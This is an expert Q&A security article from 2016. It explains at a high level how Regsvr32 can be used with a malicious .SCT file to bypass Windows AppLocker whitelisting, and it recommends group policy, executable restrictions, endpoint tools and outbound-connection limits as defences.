ra2 studio - Fotolia

Manage Learn to apply best practices and optimize your operations.

How is Windows AppLocker whitelisting bypassed by Regsvr32?

Windows AppLocker whitelisting was discovered to be exploitable with command-line tool Regsvr32. Expert Nick Lewis explains how organizations can mitigate possible attacks.

A Windows command-line utility, Regsvr32, was discovered to enable an almost undetectable Windows AppLocker whitelist...

bypass. What exactly are the risks with this vulnerability? How can enterprises secure their environments against possible attacks?

Outside of the Windows admins who are familiar with the internals of Windows going back to Windows NT, few know about the complexity and power of the legacy programming and scripting internals in modern Windows OSes. Windows system admins today might be learning PowerShell, but early Windows admins used batch and scripting languages to put together different tools to automate many tasks. These scripting tools from Microsoft admin kits were considerably powerful. One of the most difficult-to-master scripting skills was for COM+, and it was commonly used by software developers.

It's important to note that these tools are now part of the living off the land attack movement, where hackers use malware-free techniques to gain entry into an environment and use the organization's existing tools and utilities against it.

Researcher Casey Smith identified a vulnerability in Windows AppLocker, which is exploitable via the command-line tool Regsvr32 that calls a malicious .SCT file to exploit functionality in COM+ and run malicious commands as the current user. The risk from the Windows AppLocker whitelisting vulnerability is that an attacker could execute code on the endpoint to exploit other vulnerabilities there.

An enterprise can protect against these kinds of attacks on legacy functionality by disabling unnecessary functionality using group policy. Enterprises can also use the security configuration tool set from Microsoft and Active Directory to push group policy to domain-joined endpoints. An enterprise could even remove unneeded executables or remove access to the executables, but this could be complicated and have unintended consequences. Endpoint security tools like whitelisting or host-intrusion detection systems could also have similar functionality. Only allowing outbound connections on the endpoint from approved executables could also potentially block the Windows AppLocker exploit.

Next Steps

Find out how to use Windows AppLocker for application control

Consider these six questions before investing in an endpoint security product

Learn about the new Active Directory features for Windows Server 2016

This was last published in September 2016

Dig Deeper on Microsoft Windows security